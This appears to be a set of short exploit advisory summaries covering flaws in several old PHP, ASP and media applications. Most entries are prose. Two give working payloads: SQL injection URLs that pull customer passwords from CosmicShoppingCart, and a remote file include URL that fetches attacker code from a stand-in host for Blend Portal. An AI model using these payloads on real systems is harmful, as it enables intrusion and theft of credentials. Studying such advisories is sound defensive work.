This exploit allows an attacker to execute arbitrary commands on a vulnerable server running TinyPHP forum version 3.6. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'uname' parameter of the 'profile.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious PHP code to the vulnerable server. The malicious code will be written to the server's log file, which can then be accessed by the attacker to execute arbitrary commands on the server.
The Internet Shortcut URL Buffer Overflow Vulnerability is a buffer overflow in the Internet Shortcut URL (BASEURL) field of the .URL file. An attacker can exploit this vulnerability by creating a malicious .URL file whose BASEURL field contains more than 2083 characters. This will cause a buffer overflow, resulting in arbitrary code execution on the target system.
The vulnerability exists due to insufficient sanitization of user-supplied input in the 'default_path' parameter in multiple scripts. This can be exploited to execute arbitrary PHP code by including files from local or external resources.
This PoC exploits a buffer overflow vulnerability in the HTTP plugin of gxine 0.5.6. The vulnerability is triggered when a large amount of data is sent to the server. This causes a stack-based buffer overflow, which can be exploited to execute arbitrary code. The vulnerable code is located in the free() function of /lib/tls/libc.so.6. The backtrace of the vulnerable code is 0xb78eccc7 in free () from /lib/tls/libc.so.6, 0xb7438fc8 in ?? () from /usr/lib/xine/plugins/1.1.1/xineplug_inp_http.so, 0x41414141 in ?? (), 0xb7f42164 in ?? () from /usr/lib/libxine.so.1, 0x080b1810 in ?? (), 0xb7f0e635 in xine_open () from /usr/lib/libxine.so.1, 0xb7f3967f in ?? () from /usr/lib/libxine.so.1, 0x0877c084 in ?? (), 0x0930a931 in ?? (), 0x080880a2 in defs.3 (), 0xb0088478 in ?? () and 0x00000000 in ?? ().
gnopaste is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.
Nukedit is a free content management system. An Unauthorized Admin Add Exploit exists if the register.asp page is enabled. This exploit allows an attacker to add an admin user to the system by filling out the form and submitting it.
This exploit allows an attacker to change the user password of a Speedy Forum user by submitting a form with the user's name, email, ID, country, password, and re-password. The form does not have any authentication or authorization checks, allowing an attacker to change the user's password without their knowledge.
Fastpublish CMS version 1.6.9.d is affected by a remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.
SQL injections have been found in CosmicShoppingCart, a PHP/MySQL e-commerce system. These injections could be exploited by users to retrieve the passwords of the admin. Examples of the injections are: cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/* and cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--
This exploit works on Blend Portal <= 1.2.0 for phpBB 2.x. Successful exploitation requires register_globals on and allow_url_fopen on. GET -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE]. EXAMPLE -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt?